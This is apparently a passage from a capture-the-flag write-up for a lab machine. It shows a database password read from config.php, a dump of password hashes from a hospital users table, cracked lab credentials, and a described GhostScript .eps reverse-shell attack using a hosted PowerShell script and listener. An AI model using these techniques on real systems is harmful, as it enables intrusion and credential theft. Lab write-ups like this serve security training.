Enumeration

www-data@webserver:/var/www/html$ cat config.php
cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'my$qls3rv1c3!');
define('DB_NAME', 'hospital');
 
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
www-data@webserver:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: my$qls3rv1c3!

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 25
Server version: 10.11.2-MariaDB-1 Ubuntu 23.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| hospital           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.012 sec)

MariaDB [(none)]> use hospital;
use hospital;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [hospital]> show tables;
show tables;
+--------------------+
| Tables_in_hospital |
+--------------------+
| users              |
+--------------------+
1 row in set (0.000 sec)

MariaDB [hospital]> select * from users;
select * from users;
+----+----------+--------------------------------------------------------------+---------------------+
| id | username | password                                                     | created_at          |
+----+----------+--------------------------------------------------------------+---------------------+
|  1 | admin    | $2y$10$caGIEbf9DBF7ddlByqCkrexkt0cPseJJ5FiVO1cnhG.3NLrxcjMh2 | 2023-09-21 14:46:04 |
|  2 | patient  | $2y$10$a.lNstD7JdiNYxEepKf1/OZ5EM5wngYrf.m5RxXCgSud7MVU6/tgO | 2023-09-21 15:35:11 |
|  3 | haxor    | $2y$10$u5esMP8Sx/D47oRX.lUMBuK/F5RHLCcE0AyniFidN39AF7Pyu9gty | 2025-02-11 11:47:08 |
+----+----------+--------------------------------------------------------------+---------------------+
3 rows in set (0.000 sec)

I was able to escalate to root using this exploit.

If we crack the drwilliams hash we get the following credentials - drwilliams:qwe123!@#

This is our first pair of credentials. So I want to check it against the domain.

WinRM didn't work but we can RDP!

RDP fails too.

Reading the email from RoundCude we see that the user is asking for a .eps file. Turns out GhostScript has a vulnerability. If we can provide a malicious eps file we can get a reverse shell. I went online and found this poc.

Running it with revshell option creates a .eps file but its made for Unix:

We need to modify it to run in PS. I used this shell.ps1. It also shows how to trigger it. Basically we can host the shell.ps1 file and change the payload above to make a request to our web sever for this file.

Turns out a better way of doing it is creating a new payload with the --payload option.

First we need to create our string and convert it to little endian bas64

Once done we can generate the payload to run it with -enc (encoded command):

I have to start the web server and a listener. The user will open the file and we will get a PS shell.

We also find the credentials for the user:

Our new pair of credentials drbrown:chr!$br0wn. I can use these creds for winrm!

Checked SMB shares. Nothing there.

We can also RDP with this user.

PreviousFootholdNextPrivEsc

Last updated